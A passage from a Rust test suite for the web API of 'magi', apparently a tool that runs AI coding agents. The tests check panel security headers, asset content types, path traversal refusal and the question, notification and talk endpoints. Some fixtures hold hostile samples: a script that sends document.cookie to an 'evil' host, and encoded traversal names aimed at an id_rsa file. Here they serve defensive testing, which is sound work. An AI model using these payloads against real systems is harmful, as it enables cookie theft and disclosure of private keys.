4712 socket.write_all(body).await.expect("write request body");
4713 let mut raw = Vec::new();
4714 socket.read_to_end(&mut raw).await.expect("read response");
4715 let split = raw
4716 .windows(4)
4717 .position(|w| w == b"\r\n\r\n")
4718 .expect("a header block");
4719 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4720 let bytes = raw[split + 4..].to_vec();
4721 let status = head
4722 .lines()
4723 .next()
4724 .and_then(|line| line.split_whitespace().nth(1))
4725 .and_then(|code| code.parse().ok())
4726 .expect("a status line");
4727 Res {
4728 status,
4729 headers: head.to_lowercase(),
4730 head,
4731 body: String::from_utf8_lossy(&bytes).into_owned(),
4732 bytes,
4733 }
4734 }
4735
4736 fn write_run(runs: &FsPath, id: &str, status: RunStatus) {
4738 let mut state = RunState::new(
4739 PathBuf::from("/repo/magi"),
4740 "main".to_owned(),
4741 "0123456789abcdef".to_owned(),
4742 "Add a web UI\n\nMobile first.".to_owned(),
4743 Config::default(),
4744 );
4745 state.id = id.to_owned();
4746 state.status = status;
4747 let dir = runs.join(id);
4748 std::fs::create_dir_all(&dir).expect("run dir");
4749 std::fs::write(
4750 dir.join("run.json"),
4751 serde_json::to_string_pretty(&state).expect("serialize run"),
4752 )
4753 .expect("write run.json");
4754 }
4755
4756 fn write_daemon(home: &FsPath, updated_at: Timestamp) {
4757 let body = serde_json::json!({
4758 "schema": 1,
4759 "pid": 4242,
4760 "started_at": Timestamp::now().to_string(),
4761 "updated_at": updated_at.to_string(),
4762 "idle": false,
4763 "current": [{ "task": "20260902-140501-aaaa", "run": "20260902-140502-bbbb" }],
4764 "completed": 7,
4765 "polls": 143,
4766 });
4767 std::fs::write(home.join("daemon.json"), body.to_string()).expect("write daemon.json");
4768 }
4769
4770 fn launch_idle(
4780 _opts: daemon::Opts,
4781 stop: daemon::Stop,
4782 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4783 Box::pin(async move {
4784 while !stop.stopped() {
4785 tokio::time::sleep(Duration::from_millis(2)).await;
4786 }
4787 Ok(())
4788 })
4789 }
4790
4791 fn launch_broken(
4794 _opts: daemon::Opts,
4795 _stop: daemon::Stop,
4796 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4797 Box::pin(async {
4798 Err(anyhow::anyhow!(
4799 "publish the daemon status file: read-only file system"
4800 ))
4801 })
4802 }
4803
4804 static PARK_KNOCK: std::sync::Mutex<Option<SocketAddr>> = std::sync::Mutex::new(None);
4811 static PARK_HEARD: std::sync::Mutex<Option<u16>> = std::sync::Mutex::new(None);
4812
4813 fn launch_knocking_on_the_way_out(
4820 _opts: daemon::Opts,
4821 stop: daemon::Stop,
4822 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4823 Box::pin(async move {
4824 while !stop.stopped() {
4825 tokio::time::sleep(Duration::from_millis(2)).await;
4826 }
4827 let addr = PARK_KNOCK
4828 .lock()
4829 .expect("park knock")
4830 .expect("the test set an address");
4831 let heard = request(addr, "GET", "/api/health", None).await.status;
4832 *PARK_HEARD.lock().expect("park heard") = Some(heard);
4833 Ok(())
4834 })
4835 }
4836
4837 async fn settled(fx: &Fixture, want: fn(&Value) -> bool) -> Value {
4846 for _ in 0..SETTLE_STEPS {
4847 let view = fx.get("/api/loop").await.json();
4848 if want(&view) {
4849 return view;
4850 }
4851 tokio::time::sleep(Duration::from_millis(10)).await;
4852 }
4853 panic!(
4854 "the loop never settled: {}",
4855 fx.get("/api/loop").await.json()
4856 );
4857 }
4858
4859 fn ask(fx: &Fixture, summary: &str, choices: &[&str]) -> String {
4861 let store = fx.questions();
4862 let mut q = Question::new(
4863 "20260902-000000-beef".to_owned(),
4864 "implement".to_owned(),
4865 "impl-A".to_owned(),
4866 summary.to_owned(),
4867 "because it matters".to_owned(),
4868 choices.iter().map(|c| (*c).to_owned()).collect(),
4869 );
4870 store.put(&mut q).expect("put question");
4871 q.id
4872 }
4873
4874 fn panel(fx: &Fixture, html: &str, assets: &[(&str, &[u8])]) -> String {
4880 let store = fx.questions();
4881 let mut q = Question::new(
4882 "20260902-000000-beef".to_owned(),
4883 "land".to_owned(),
4884 "fix".to_owned(),
4885 "Merge this?".to_owned(),
4886 "the diff is in the panel".to_owned(),
4887 vec!["merge".to_owned(), "hold".to_owned()],
4888 );
4889 let staging = fx.home.path().join("staging");
4892 std::fs::create_dir_all(&staging).expect("staging dir");
4893 let sources: Vec<PathBuf> = assets
4894 .iter()
4895 .map(|(name, bytes)| {
4896 let path = staging.join(name);
4897 std::fs::write(&path, bytes).expect("write staged asset");
4898 path
4899 })
4900 .collect();
4901 store
4902 .put_panel(&mut q, html, &sources)
4903 .expect("write the panel");
4904 store.put(&mut q).expect("put question");
4905 q.id
4906 }
4907
4908 fn seed_talk(fx: &Fixture, id: &str, status: &str) -> String {
4917 let store = fx.talks();
4918 std::fs::create_dir_all(store.root()).expect("talks dir");
4919 let seat = serde_json::to_value(crate::agent::SeatState::new("talk", "mock", 7))
4920 .expect("serialize a seat");
4921 let body = serde_json::json!({
4922 "schema": 1,
4923 "id": id,
4924 "repo": "/repo/magi",
4925 "agent": "mock",
4926 "status": status,
4927 "turns": [],
4928 "created_at": Timestamp::now().to_string(),
4929 "updated_at": Timestamp::now().to_string(),
4930 "seat": seat,
4931 });
4932 std::fs::write(store.path_of(id), body.to_string()).expect("write the talk");
4933 store.get(id).expect("the seeded talk has to be readable");
4934 id.to_owned()
4935 }
4936
4937 #[tokio::test]
4938 async fn both_panel_routes_send_the_whole_policy_that_makes_agent_html_safe() {
4939 let fx = Fixture::start().await;
4940 let id = panel(
4941 &fx,
4942 "<h1>Merge?</h1><img src=\"diff.svg\">",
4943 &[("diff.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>")],
4944 );
4945
4946 for path in [
4947 format!("/api/questions/{id}/panel"),
4948 format!("/api/questions/{id}/asset/diff.svg"),
4949 ] {
4950 let res = fx.get(&path).await;
4951 assert_eq!(res.status, 200, "{path}: {}", res.body);
4952 assert_eq!(
4958 res.header("content-security-policy"),
4959 Some(
4960 "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
4961 font-src data:; base-uri 'none'; form-action 'none'; \
4962 frame-ancestors 'self'"
4963 ),
4964 "{path} is the only thing between a hostile panel and the tailnet"
4965 );
4966 assert_eq!(
4967 res.header("x-content-type-options"),
4968 Some("nosniff"),
4969 "{path}: a browser must not re-decide the type we sent"
4970 );
4971 assert_eq!(
4972 res.header("referrer-policy"),
4973 Some("no-referrer"),
4974 "{path}: a panel must not leak the question id off the machine"
4975 );
4976
4977 let pre = fx.head(&path).await;
4982 assert_eq!(pre.status, res.status, "{path}: HEAD must agree with GET");
4983 assert_eq!(
4984 pre.header("content-security-policy"),
4985 res.header("content-security-policy"),
4986 "{path}: the preflight carries the same policy"
4987 );
4988 assert_eq!(
4989 pre.header("content-type"),
4990 res.header("content-type"),
4991 "{path}: the preflight carries the same type"
4992 );
4993 }
4994 }
4995
4996 #[tokio::test]
4997 async fn a_panel_reaches_the_browser_byte_for_byte() {
4998 let fx = Fixture::start().await;
4999 let html = "<h1>Merge?</h1><p>a < b — 変更</p><script>alert(1)</script>";
5004 let id = panel(&fx, html, &[]);
5005
5006 let res = fx.get(&format!("/api/questions/{id}/panel")).await;
5007
5008 assert_eq!(res.status, 200);
5009 assert_eq!(res.bytes, html.as_bytes(), "served verbatim, not sanitised");
5010 assert_eq!(res.header("content-type"), Some("text/html; charset=utf-8"));
5011 assert_eq!(
5012 res.header("content-disposition"),
5013 None,
5014 "the panel itself is rendered in the frame, not downloaded"
5015 );
5016 }
5017
5018 #[tokio::test]
5019 async fn an_svg_asset_is_a_download_and_a_png_is_not() {
5020 let fx = Fixture::start().await;
5021 let svg = b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>";
5022 let png = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR".as_slice();
5023 let id = panel(
5024 &fx,
5025 "<img src=\"diff.svg\"><img src=\"shot.png\">",
5026 &[("diff.svg", svg), ("shot.png", png)],
5027 );
5028
5029 let as_svg = fx.get(&format!("/api/questions/{id}/asset/diff.svg")).await;
5030 let as_png = fx.get(&format!("/api/questions/{id}/asset/shot.png")).await;
5031
5032 assert_eq!(as_svg.status, 200);
5033 assert_eq!(as_svg.header("content-type"), Some("image/svg+xml"));
5034 assert_eq!(as_svg.header("content-disposition"), Some("attachment"));
5039
5040 assert_eq!(as_png.status, 200);
5041 assert_eq!(as_png.header("content-type"), Some("image/png"));
5042 assert_eq!(
5043 as_png.header("content-disposition"),
5044 None,
5045 "a raster image has no execution surface, so tapping it still shows it"
5046 );
5047 assert_eq!(as_png.bytes, png, "a binary asset survives the round trip");
5048 }
5049
5050 #[tokio::test]
5051 async fn an_html_asset_is_never_served_as_html() {
5052 let fx = Fixture::start().await;
5053 let id = panel(
5054 &fx,
5055 "<p>see the notes</p>",
5056 &[
5057 (
5058 "notes.html",
5059 b"<script>fetch('http://evil/'+document.cookie)</script>",
5060 ),
5061 ("hook.js", b"fetch('http://evil/')"),
5062 ("data.json", b"{}"),
5063 ("HEADLINE.TXT", b"plain"),
5064 ],
5065 );
5066
5067 for name in ["notes.html", "hook.js", "data.json"] {
5068 let res = fx.get(&format!("/api/questions/{id}/asset/{name}")).await;
5069 assert_eq!(res.status, 200, "{name}: {}", res.body);
5070 assert_eq!(
5075 res.header("content-type"),
5076 Some("application/octet-stream"),
5077 "{name} must not be a type the browser will execute or render"
5078 );
5079 }
5080 let txt = fx
5083 .get(&format!("/api/questions/{id}/asset/HEADLINE.TXT"))
5084 .await;
5085 assert_eq!(
5086 txt.header("content-type"),
5087 Some("text/plain; charset=utf-8")
5088 );
5089 }
5090
5091 #[tokio::test]
5092 async fn no_spelling_of_a_traversing_asset_name_reaches_the_filesystem() {
5093 let fx = Fixture::start().await;
5094 let id = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5095 std::fs::write(fx.questions().root().join("id_rsa"), b"secret").expect("write the bait");
5099
5100 for encoded in [
5107 "%2e%2e%2fid_rsa",
5108 "..%2fid_rsa",
5109 "..%5cid_rsa",
5110 "%2e%2e%5cid_rsa",
5111 "diff%00.svg",
5112 "..",
5113 ".hidden",
5114 "%2e%2e%2f%2e%2e%2fid_rsa",
5115 ] {
5116 let res = fx
5117 .get(&format!("/api/questions/{id}/asset/{encoded}"))
5118 .await;
5119 assert_eq!(
5120 res.status, 400,
5121 "`{encoded}` has to be refused by name, not looked up: {}",
5122 res.body
5123 );
5124 assert!(res.json()["error"].is_string(), "{}", res.body);
5125 }
5126
5127 for literal in ["../id_rsa", "../../questions/id_rsa", "..%5c../id_rsa"] {
5133 let res = fx
5134 .get(&format!("/api/questions/{id}/asset/{literal}"))
5135 .await;
5136 assert_eq!(
5137 res.status, 404,
5138 "`{literal}` must not match the asset route at all: {}",
5139 res.body
5140 );
5141 }
5142 }
5143
5144 #[tokio::test]
5145 async fn a_missing_panel_and_an_unknown_asset_are_both_json_404s() {
5146 let fx = Fixture::start().await;
5147 let plain = ask(&fx, "Which backend?", &["SQLite"]);
5148 let with_panel = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5149
5150 let none = fx.get(&format!("/api/questions/{plain}/panel")).await;
5154 assert_eq!(none.status, 404, "{}", none.body);
5155 assert!(none.json()["error"].is_string(), "{}", none.body);
5156 assert_eq!(
5157 fx.head(&format!("/api/questions/{plain}/panel"))
5158 .await
5159 .status,
5160 404,
5161 "the preflight is the only way the client can learn this"
5162 );
5163
5164 let missing = fx
5166 .get(&format!("/api/questions/{with_panel}/asset/absent.png"))
5167 .await;
5168 assert_eq!(missing.status, 404, "{}", missing.body);
5169 assert!(missing.json()["error"].is_string(), "{}", missing.body);
5170
5171 assert_eq!(fx.get("/api/questions/nope/panel").await.status, 404);
5173 assert_eq!(
5174 fx.get("/api/questions/nope/asset/diff.svg").await.status,
5175 404
5176 );
5177 }
5178
5179 #[tokio::test]
5180 async fn a_run_with_an_open_question_reads_as_waiting() {
5181 let fx = Fixture::start().await;
5182 let run = "20260902-000000-beef".to_owned();
5183 write_run(&fx.runs(), &run, RunStatus::Implementing);
5184
5185 let before = fx.get("/api/runs").await.json();
5186 assert_eq!(before[0]["waiting"], false, "{before}");
5187
5188 let store = fx.questions();
5189 let mut q = Question::new(
5190 run.clone(),
5191 "implement".to_owned(),
5192 "impl-A".to_owned(),
5193 "Which backend?".to_owned(),
5194 String::new(),
5195 vec!["SQLite".to_owned()],
5196 );
5197 store.put(&mut q).expect("put");
5198
5199 let during = fx.get("/api/runs").await.json();
5200 assert_eq!(during[0]["waiting"], true, "{during}");
5201
5202 q.answer(Answer::Choice("SQLite".to_owned()))
5205 .expect("answer");
5206 store.put(&mut q).expect("put");
5207 let after = fx.get("/api/runs").await.json();
5208 assert_eq!(after[0]["waiting"], false, "{after}");
5209 }
5210
5211 #[tokio::test]
5212 async fn an_open_question_is_listed_and_counted_by_health() {
5213 let fx = Fixture::start().await;
5214 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5215
5216 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5217 let listed = fx.get("/api/questions").await.json();
5218 assert_eq!(listed.as_array().expect("array").len(), 1);
5219 assert_eq!(listed[0]["id"], id);
5220 assert_eq!(listed[0]["status"], "open");
5221 assert_eq!(listed[0]["choices"][1], "Redis");
5222 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5225 }
5226
5227 #[tokio::test]
5228 async fn answering_records_the_choice_and_a_second_answer_conflicts() {
5229 let fx = Fixture::start().await;
5230 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5231 let path = format!("/api/questions/{id}/answer");
5232
5233 let res = fx.post(&path, Some(r#"{"choice":"Redis"}"#)).await;
5234 assert_eq!(res.status, 200, "{}", res.body);
5235 let body = res.json();
5236 assert_eq!(body["status"], "answered");
5237 assert_eq!(body["answer"]["choice"], "Redis");
5238
5239 let again = fx.post(&path, Some(r#"{"choice":"SQLite"}"#)).await;
5243 assert_eq!(again.status, 409, "{}", again.body);
5244 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5245 }
5246
5247 #[tokio::test]
5248 async fn saying_something_appends_a_turn_without_answering() {
5249 let fx = Fixture::start().await;
5250 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5251 let path = format!("/api/questions/{id}/say");
5252
5253 let res = fx
5254 .post(&path, Some(r#"{"body":"why not Postgres?"}"#))
5255 .await;
5256 assert_eq!(res.status, 200, "{}", res.body);
5257 let body = res.json();
5258 assert_eq!(body["status"], "open", "talking back is not a decision");
5259 assert_eq!(body["answer"], Value::Null);
5260 assert_eq!(body["thread"][0]["who"], "operator");
5261 assert_eq!(body["thread"][0]["body"], "why not Postgres?");
5262 assert_eq!(body["waiting_on_agent"], true);
5263 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5265 }
5266
5267 #[tokio::test]
5268 async fn asking_back_clears_the_owner_count_until_the_agent_replies() {
5269 let fx = Fixture::start().await;
5270 let store = fx.questions();
5271 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5272 assert_eq!(
5273 fx.get("/api/health").await.json()["questions_needs_owner"],
5274 1
5275 );
5276
5277 let res = fx
5283 .post(
5284 &format!("/api/questions/{id}/say"),
5285 Some(r#"{"body":"why not Postgres?"}"#),
5286 )
5287 .await;
5288 assert_eq!(res.status, 200, "{}", res.body);
5289 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5290 assert_eq!(
5291 fx.get("/api/health").await.json()["questions_needs_owner"],
5292 0,
5293 "waiting on the agent is not waiting on the owner"
5294 );
5295
5296 let mut q = store.get(&id).expect("get");
5300 q.reply("because SQLite needs no server", vec!["SQLite".to_owned()])
5301 .expect("reply");
5302 store.put(&mut q).expect("put");
5303 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5304 assert_eq!(
5305 fx.get("/api/health").await.json()["questions_needs_owner"],
5306 1,
5307 "the agent's reply is what should light the banner back up"
5308 );
5309 }
5310
5311 #[tokio::test]
5312 async fn saying_something_is_refused_when_empty_answered_or_abandoned() {
5313 let fx = Fixture::start().await;
5314 let store = fx.questions();
5315
5316 let empty_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5317 let res = fx
5318 .post(
5319 &format!("/api/questions/{empty_id}/say"),
5320 Some(r#"{"body":" "}"#),
5321 )
5322 .await;
5323 assert_eq!(res.status, 400, "{}", res.body);
5324
5325 let answered_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5326 let mut answered = store.get(&answered_id).expect("get");
5327 answered
5328 .answer(Answer::Choice("SQLite".to_owned()))
5329 .expect("answer");
5330 store.put(&mut answered).expect("put");
5331 let res = fx
5332 .post(
5333 &format!("/api/questions/{answered_id}/say"),
5334 Some(r#"{"body":"still there?"}"#),
5335 )
5336 .await;
5337 assert_eq!(res.status, 409, "{}", res.body);
5338
5339 let abandoned_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5340 let mut abandoned = store.get(&abandoned_id).expect("get");
5341 abandoned.abandon("timed out");
5342 store.put(&mut abandoned).expect("put");
5343 let res = fx
5344 .post(
5345 &format!("/api/questions/{abandoned_id}/say"),
5346 Some(r#"{"body":"still there?"}"#),
5347 )
5348 .await;
5349 assert_eq!(res.status, 409, "{}", res.body);
5350 }
5351
5352 #[tokio::test]
5353 async fn an_answer_the_question_does_not_offer_is_refused() {
5354 let fx = Fixture::start().await;
5355 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5356 let path = format!("/api/questions/{id}/answer");
5357
5358 for body in [
5359 r#"{"choice":"Postgres"}"#,
5360 r#"{"text":"whatever you think"}"#,
5361 r#"{"choice":"Redis","text":"both"}"#,
5362 r#"{}"#,
5363 ] {
5364 let res = fx.post(&path, Some(body)).await;
5365 assert_eq!(res.status, 400, "{body} should be refused: {}", res.body);
5366 assert!(res.json()["error"].is_string(), "{}", res.body);
5367 }
5368 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5370 }
5371
5372 #[tokio::test]
5373 async fn a_free_text_question_takes_text_and_not_a_choice() {
5374 let fx = Fixture::start().await;
5375 let id = ask(&fx, "What should the flag be called?", &[]);
5376 let path = format!("/api/questions/{id}/answer");
5377
5378 assert_eq!(
5379 fx.post(&path, Some(r#"{"choice":"--json"}"#)).await.status,
5380 400
5381 );
5382 let res = fx.post(&path, Some(r#"{"text":"--json"}"#)).await;
5383 assert_eq!(res.status, 200, "{}", res.body);
5384 assert_eq!(res.json()["answer"]["text"], "--json");
5385 }
5386
5387 #[tokio::test]
5388 async fn an_unknown_question_is_a_json_404() {
5389 let fx = Fixture::start().await;
5390 let res = fx
5391 .post("/api/questions/nope/answer", Some(r#"{"text":"x"}"#))
5392 .await;
5393 assert_eq!(res.status, 404, "{}", res.body);
5394 assert!(res.json()["error"].is_string());
5395 }
5396
5397 #[tokio::test]
5398 async fn notifications_list_read_dismiss_and_health_agree() {
5399 let fx = Fixture::start().await;
5400 let store = Notices::at(fx.home.path().join("notifications"));
5401 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 0);
5402 let rev0 = fx.get("/api/health").await.json()["notifications_rev"].clone();
5403
5404 let a = store.raise(Notice::warn("task:1", "held")).unwrap();
5405 let b = store.raise(Notice::error("run:2", "blocked")).unwrap();
5406
5407 let health = fx.get("/api/health").await.json();
5408 assert_eq!(health["notifications_unread"], 2);
5409 assert_ne!(
5410 health["notifications_rev"], rev0,
5411 "the badge must move live"
5412 );
5413
5414 let listed = fx.get("/api/notifications").await.json();
5415 assert_eq!(listed["unread"], 2);
5416 assert_eq!(listed["items"].as_array().unwrap().len(), 2);
5417 assert_eq!(listed["items"][0]["severity"], "error", "newest first");
5418
5419 let read = fx
5420 .post(&format!("/api/notifications/{}/read", a.id), None)
5421 .await;
5422 assert_eq!(read.status, 200, "{}", read.body);
5423 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 1);
5424
5425 let gone = fx
5426 .post(&format!("/api/notifications/{}/dismiss", b.id), None)
5427 .await;
5428 assert_eq!(gone.status, 200, "{}", gone.body);
5429 let listed = fx.get("/api/notifications").await.json();
5430 assert_eq!(listed["items"].as_array().unwrap().len(), 1);
5431 assert_eq!(listed["unread"], 0);
5432
5433 store.raise(Notice::info("x", "again")).unwrap();
5434 let all = fx.post("/api/notifications/read-all", None).await;
5435 assert_eq!(all.status, 200, "{}", all.body);
5436 assert_eq!(all.json()["marked"], 1);
5437 assert_eq!(
5438 fx.get("/api/health").await.json()["notifications_unread"],
5439 0
5440 );
5441
5442 let missing = fx.post("/api/notifications/nope/read", None).await;
5443 assert_eq!(missing.status, 404, "{}", missing.body);
5444 assert!(missing.json()["error"].is_string());
5445 }
5446
5447 #[tokio::test]
5454 async fn a_task_cannot_be_filed_over_the_phone_directly() {
5455 let f = Fixture::start().await;
5456
5457 let res = f
5458 .post(
5459 "/api/queue",
5460 Some(r#"{"instruction":"Add a --json flag to magi list"}"#),
5461 )
5462 .await;
5463
5464 assert_eq!(
5465 res.status, 405,
5466 "POST /api/queue must not be a route: {}",
5467 res.body
5468 );
5469 assert!(
5470 f.queue().list().is_empty(),
5471 "a task filed by a route that does not exist must not reach the disk"
5472 );
5473 assert_eq!(f.get("/api/queue").await.status, 200);
5476 }
5477
5478 fn make_checkout(root: &FsPath, host: &str, owner: &str, repo: &str) {
5480 std::fs::create_dir_all(root.join(host).join(owner).join(repo).join(".git"))
5481 .expect("checkout dir");
5482 }
5483
5484 #[tokio::test]
5485 async fn repos_list_returns_name_and_path_for_every_configured_root() {
5486 let tmp = TempDir::new().expect("tempdir");
5487 let repo = tmp.path().join("repo");
5488 std::fs::create_dir_all(&repo).expect("repo dir");
5489 let root = tmp.path().join("root");
5490 make_checkout(&root, "github.com", "yukimemi", "magi");
5491 std::fs::write(
5492 repo.join("magi.toml"),
5493 format!(
5494 "[repos]\nroots = [{:?}]\n",
5495 root.to_string_lossy().into_owned()
5496 ),
5497 )
5498 .expect("write magi.toml");
5499
5500 let f = Fixture::with_repo(repo).await;
5501 let res = f.get("/api/repos").await;
5502 assert_eq!(res.status, 200, "{}", res.body);
5503 let list = res.json();
5504 let repos = list.as_array().expect("an array");
5505 assert_eq!(repos.len(), 1);
5506 assert_eq!(repos[0]["name"], "yukimemi/magi");
5507 assert!(
5508 repos[0]["path"]
5509 .as_str()
5510 .is_some_and(|p| p.ends_with("magi") || p.contains("magi")),
5511 "{list}"
5512 );
5513 }
5514
5515 #[tokio::test]
5516 async fn repos_list_only_rescans_within_the_ttl_when_asked_to() {
5517 let tmp = TempDir::new().expect("tempdir");
5518 let repo = tmp.path().join("repo");
5519 std::fs::create_dir_all(&repo).expect("repo dir");
5520 let root = tmp.path().join("root");
5521 make_checkout(&root, "github.com", "yukimemi", "magi");
5522 std::fs::write(
5523 repo.join("magi.toml"),
5524 format!(
5525 "[repos]\nroots = [{:?}]\nscan_ttl = 3600\n",
5526 root.to_string_lossy().into_owned()
5527 ),
5528 )
5529 .expect("write magi.toml");
5530
5531 let f = Fixture::with_repo(repo).await;
5532 let first = f.get("/api/repos").await;
5533 assert_eq!(first.json().as_array().map(Vec::len), Some(1));
5534
5535 make_checkout(&root, "github.com", "yukimemi", "rvpm");
5538 let second = f.get("/api/repos").await;
5539 assert_eq!(
5540 second.json().as_array().map(Vec::len),
5541 Some(1),
5542 "a fresh cache must not rescan inside the TTL"
5543 );
5544
5545 let refreshed = f.get("/api/repos?refresh=1").await;
5546 assert_eq!(
5547 refreshed.json().as_array().map(Vec::len),
5548 Some(2),
5549 "an explicit refresh must rescan even inside the TTL"
5550 );
5551 }
5552
5553 const MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && printf ok\"]\n";
5559
5560 async fn talk_fixture() -> (TempDir, PathBuf, Fixture) {
5564 let tmp = TempDir::new().expect("tempdir");
5565 let repo = tmp.path().join("repo");
5566 std::fs::create_dir_all(&repo).expect("repo dir");
5567 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5568 let f = Fixture::with_repo(repo.clone()).await;
5569 (tmp, repo, f)
5570 }
5571
5572 #[tokio::test]
5573 async fn posting_a_talk_with_no_body_opens_one_and_takes_no_turn() {
5574 let (_tmp, _repo, f) = talk_fixture().await;
5575
5576 let opened = f.post("/api/talks", None).await;
5579 assert_eq!(opened.status, 201, "{}", opened.body);
5580 let body = opened.json();
5581 assert_eq!(body["status"], "open");
5582 assert_eq!(
5583 body["turns"].as_array().unwrap().len(),
5584 0,
5585 "opening takes no agent turn: there is nothing yet to answer"
5586 );
5587
5588 let also_opened = f.post("/api/talks", Some("{}")).await;
5590 assert_eq!(also_opened.status, 201, "{}", also_opened.body);
5591
5592 let listed = f.get("/api/talks").await.json();
5593 assert_eq!(listed.as_array().unwrap().len(), 2);
5594 }
5595
5596 #[tokio::test]
5597 async fn talk_detail_lists_the_tasks_it_has_filed_and_stays_open() {
5598 let f = Fixture::start().await;
5599 let talk_id = seed_talk(&f, "20260904-014455-ab12", "open");
5600 let queue = f.queue();
5601 let mut mine = Task::new(
5602 "rename the loader".to_owned(),
5603 "rename the loader".to_owned(),
5604 PathBuf::from("/repo/magi"),
5605 Source::Agent {
5606 run: talk_id.clone(),
5607 node: "chat".to_owned(),
5608 },
5609 );
5610 queue.put(&mut mine).expect("file the task");
5611 let mut theirs = Task::new(
5612 "unrelated".to_owned(),
5613 "unrelated".to_owned(),
5614 PathBuf::from("/repo/magi"),
5615 Source::Human,
5616 );
5617 queue.put(&mut theirs).expect("file the task");
5618
5619 let res = f.get(&format!("/api/talks/{talk_id}")).await;
5620 assert_eq!(res.status, 200, "{}", res.body);
5621 let body = res.json();
5622 assert_eq!(
5623 body["status"], "open",
5624 "filing a task does not close a talk"
5625 );
5626 let tasks = body["tasks"].as_array().expect("tasks array");
5627 assert_eq!(tasks.len(), 1, "only this talk's own task is listed");
5628 assert_eq!(tasks[0]["id"], mine.id);
5629 }
5630
5631 #[tokio::test]
5632 async fn talk_say_records_the_operators_turn_before_the_agents_reply_lands() {
5633 let (_tmp, _repo, f) = talk_fixture().await;
5634 let id = f.post("/api/talks", None).await.json()["id"]
5635 .as_str()
5636 .expect("id")
5637 .to_owned();
5638
5639 let res = f
5640 .post(
5641 &format!("/api/talks/{id}/say"),
5642 Some(r#"{"text":"what does the queue module do?"}"#),
5643 )
5644 .await;
5645 assert_eq!(res.status, 202, "{}", res.body);
5646 let queued = res.json();
5647 let turns = queued["turns"].as_array().expect("turns array");
5648 assert_eq!(
5649 turns.len(),
5650 1,
5651 "the answer reflects only what is on disk the instant it is sent, \
5652 before the agent's turn - which can run for the whole of \
5653 `[graph] timeout_talk` - has a chance to land: {queued}"
5654 );
5655 assert_eq!(turns[0]["who"], "operator");
5656 assert_eq!(turns[0]["body"], "what does the queue module do?");
5657 assert_eq!(
5658 queued["thinking"], true,
5659 "the accepted response exposes the background turn claim: {queued}"
5660 );
5661
5662 let mut turns_after = 1;
5663 for _ in 0..SETTLE_STEPS {
5664 let detail = f.get(&format!("/api/talks/{id}")).await.json();
5665 turns_after = detail["turns"].as_array().expect("turns array").len();
5666 if turns_after == 2 {
5667 break;
5668 }
5669 tokio::time::sleep(Duration::from_millis(10)).await;
5670 }
5671 assert_eq!(turns_after, 2, "the agent's reply eventually lands");
5672 }
5673
5674 #[tokio::test]
5701 async fn a_dropped_handler_future_after_recording_still_gets_an_agent_reply() {
5702 let tmp = TempDir::new().expect("tempdir");
5703 let repo = tmp.path().join("repo");
5704 std::fs::create_dir_all(&repo).expect("repo dir");
5705 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5706 let home = TempDir::new().expect("temp home");
5707 let talks = Talks::at(home.path().join("talks"));
5708 let ui = Arc::new(
5709 Ui::new(
5710 Queue::at(home.path().join("queue")),
5711 Questions::at(home.path().join("questions")),
5712 talks.clone(),
5713 home.path().join("runs"),
5714 home.path().to_path_buf(),
5715 repo.clone(),
5716 )
5717 .with_worktrees_root(home.path().join("wt")),
5718 );
5719 let cfg = config_for(&repo).await.expect("discover config");
5720
5721 for delay in 0..40u32 {
5722 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5723 let id = talk.id.clone();
5724
5725 let handler = tokio::spawn(talk_say(
5726 State(Arc::clone(&ui)),
5727 Path(id.clone()),
5728 Ok(Json(NewTalkTurn {
5729 text: "what does the queue module do?".to_owned(),
5730 attachments: Vec::new(),
5731 })),
5732 ));
5733 tokio::time::sleep(Duration::from_micros(u64::from(delay) * 500)).await;
5734 handler.abort();
5735 let _ = handler.await;
5738
5739 let mut turns = 0;
5740 for _ in 0..SETTLE_STEPS {
5741 if let Ok(fresh) = talks.get(&id) {
5742 turns = fresh.turns.len();
5743 if turns != 1 {
5744 break;
5745 }
5746 }
5747 tokio::time::sleep(Duration::from_millis(10)).await;
5748 }
5749 assert_ne!(
5750 turns, 1,
5751 "delay {delay}: talk {id} recorded the operator's turn but \
5752 the agent never answered - the reply task was never \
5753 started after the handler future was dropped"
5754 );
5755 }
5756 }
5757
5758 #[tokio::test]
5803 async fn a_dropped_handler_future_after_queueing_still_drains_the_draft() {
5804 let tmp = TempDir::new().expect("tempdir");
5805 let repo = tmp.path().join("repo");
5806 std::fs::create_dir_all(&repo).expect("repo dir");
5807 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5808 let home = TempDir::new().expect("temp home");
5809 let talks = Talks::at(home.path().join("talks"));
5810 let ui = Arc::new(
5811 Ui::new(
5812 Queue::at(home.path().join("queue")),
